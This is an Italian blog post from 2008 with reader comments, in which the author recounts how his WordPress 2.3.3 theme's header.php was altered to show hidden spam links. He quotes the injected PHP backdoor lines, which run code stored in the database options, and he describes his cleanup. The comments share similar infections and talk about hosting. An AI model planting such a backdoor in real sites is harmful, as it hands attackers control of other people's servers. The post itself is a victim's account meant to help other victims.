Il post nel quale Mik racconta di un problema di sicurezza avuto sul suo blog, mi ha fatto ricordare che qualche tempo fa una cosa del genere è successa anche a me. Un simpatico burlone era riuscito a modificare il file header.php del mio tema in modo tale da far apparire alcune righe di link spammosi (i soliti viagra, cialis, rolex fasulli e casinò online) sopra la testata del blog. Stranamente questi link a me non venivano mostrati, quindi non mi ero accorto di niente. Poi il caro Manfrys, scherzando, mi ha chiesto quanto stessi guadagnando da tutta quella pubblicità e così è scattato l’allarme rosso e mi sono fiondato su Google alla ricerca di informazioni e consigli utili per risolvere questa vulnerabilità. Risultato della ricerca: zero. Problemi simili al mio si erano verificati su blog che giravano su versioni molto vecchie di WordPress, sfruttando una falla poi chiusa: io invece stavo utilizzando l’ultima versione disponibile (all’epoca la 2.3.3) e non avevo installato alcun plugin di cui fossero noti problemi. Da una rapida occhiata al sorgente della home pubblicata online, mi sono accorto che i link di spam venivano richiamati attraverso un misterioso:
<div id="goro"> <a href="...">...</a> </div>
In corrispondenza dell’enigmatico goro, nel file header.php erano state aggiunte le seguenti righe di codice:
<?php create_function('', get_option("blog_headers")); ?>
...
<?php $wp_headers() ?>
In pratica, il caro untore era riuscito persino a sputtanarmi il database. Non essendo io in grado di stabilire se la colpa fosse di WordPress, del mio hosting o di chissà cosa, non ho potuto fare altro che ripristinare il file header.php da un backup, eliminare le centinaia di voci rss_millemilacaratteriacazzo aggiunte alla tabella wp_options del database ed infine blindare le cartelle di WordPress, rinunciando anche alla possibilità di modificare i file del mio tema ed i plugin direttamente dal pannello di controllo. Condivido la mia (dis)avventura affinché altre eventuali vittime di questo pirla possano arrivare qui tramite Google e risolvere il problema, ma soprattutto affinché eventuali guru possano magari capire come eliminarne la causa.
Scritto da Maxime il 15 aprile 2008
WordPress | 
Blog reactions | | 
Vota
Ti ringrazio per aver segnalato il mio articolo e per aver condiviso con tutti, i tuoi guai.
Tra l’altro ho ancora questo benedetto trojan nel mio portatile e non sono riuscito ad eliminarlo. Io mi chedo se queste simpaticche canaglie non hanno niente di meglio da fare che violare blog che danno un contributo alla blogosfera italiana.
@Maxime scusa la domanda ma hai “blindato” tutte tutte le cartelle? anche upload ecc. ecc.
Comunque io ho un inconveniente curioso sul mio secondo blog (gira su 2.3.3 e non posso per ora aggiornarlo) quando posto all’interno del post si aggiungono linee di codice provenienti dalla dashboard con tanto di benvenuto ecc. ecc. e gli rss delle notizie ed i link d’ingresso me ne sono accorto rileggendo alcuni post e vedendo scritte e pulsanti sovrapposti al template.
.:.
mai vista una cosa simile…io uso il tema stardust in entrambi i siti(anche se uno non è mio) e non ho visto niente, non mi è mai successa questa menata, non è che possa essere il tema ad avere qualche vulnerabilità? Il 2.5 di wp non lo ho ancora messo perché mi dà problemi sul media uploader e avendo un sito di audio lo tengo in manutenzione fino a che non risolvono i guai, cmq fammi sapere quale è il tema, così non lo scarico! ciao
Accidenti ed io sono appena passato su WP 2.5 speriamo bene
Peraltro, da che sapevo, Technorati non indicizza più (o voleva non indicizzare più) WordPress < 2.5.
Credo sia un errore. Va risolta la falla, non bandito chi ne è affetto!
Però, se non ho capito male, la falla è comunque rimasta!
anche a me è successo un mese fa circa su un blog Wordpress 2.3.3. Mi erano comparsi un paio di link spam nella colonna laterale di destra. Mi ricordo soltanto che per toglierli, oltre a cancellarli dal blogroll ho dovuto anche reimpostare i widget della colonna laterale.
Partendo dal tuo post, e seguendo una catena di link, ho fatto qualche indagine, e la cosa potrebbe essere peggio di quanto sembra. Sul mio blog ho fatto una analisi preliminare, se vi interessa è là.
In due casi ho trovato siti con Wordpress 2.5 compromessi. Potrebbero essere “rimanenze” dell’intrusione lasciate dall’upgrade fatto troppo in fretta, ma dato che il codice presente sulle pagine interviene al livello di header, quindi prima ancora che venga emesso un solo tag HTML, non ci conterei troppo. Ho già cercato di contattare il team di Wordpress, ma non ho ancora ricevuto risposta.
E’ un problema noto (ma la soluzione non sembra che sia abbastanza nota
se cerchi su google: “header.php modified spam” oppure “spam goro” trovi molte informazioni:
link 1
link 2
link 3
ciao!
hermansji: ho blindato tutte le cartelle che potevano essere tranquillamente blindate senza che il funzionamento di WordPress ne risentisse. In particolare, la cartella upload non può essere blindata, se la usi…
nex: conoscevo quei link (e tanti altri ancora, visto che dopo quel problema ho passato le nottate su Google e sui forum), ma a quanto pare nessuno ha avuto il mio stesso identico problema. Di simile c’è solo il fantomatico “goro”…
Ciao!!!
Hai mica un invito di twine da mandarmi??
ilbellodelweb@gmail.com
Grazie e bel blog
OT: manco a farlo apposta passavo da queste parti proprio per chiederti il nome del tuo hosting visto che nei miei pellegrinaggi alla ricerca di un nuovo servizio di hosting, ero incappato in un tuo vecchio post in cui parlavi dell’abbandono di Tophost.
))
E mi ero segnato il tuo blog perché avevo notato che il tuo dominio non solo funziona anche senza il “www” davanti all’indirizzo, ma lo stesso vale per i permalink ed i sottodomini (Aruba ad es. li reindirizza sempre alla HP).
Beh visto che l’hai scritto nel post non ti devo rompere con una mail… quando si dice la coincidenza
Ciaoooooooo
PS: mi è venuto un dubbio: non è che i problemi di sicurezza dipendavano proprio dal tuo hosting?
)))
Damiano: inviti terminati, mi dispiace. Provo a chiedere a qualche amico.
Kagliostro: quando si è verificato quel problema già non ero più su TopHost, ma su WebPerTe.
Sì sì, Maxime, l’avevo capito. Ed infatti mi chiedevo se i tuoi attuali problemi -risolti- fossero dovuti proprio al “nuovo” hosting.
In ogni caso sono molto tentato di provarlo questo Webperte…
Anzi, se esistono delle promozioni per chi porta qualcuno, fammi sapere che mi iscrivo grazie a te visto che c’è proprio un dominio che vorrei comprare da tanto tempo (niente di che, ma così vedo com’è il piano REDIRECT che offre la casa madre di Wepperte cioé http://hsp.aziendeitalia.com/hspc/plans.php).
Ciaoooooo
… quindi non mi stavo “facendo” di sostanze strane
!! Ciao Maxime!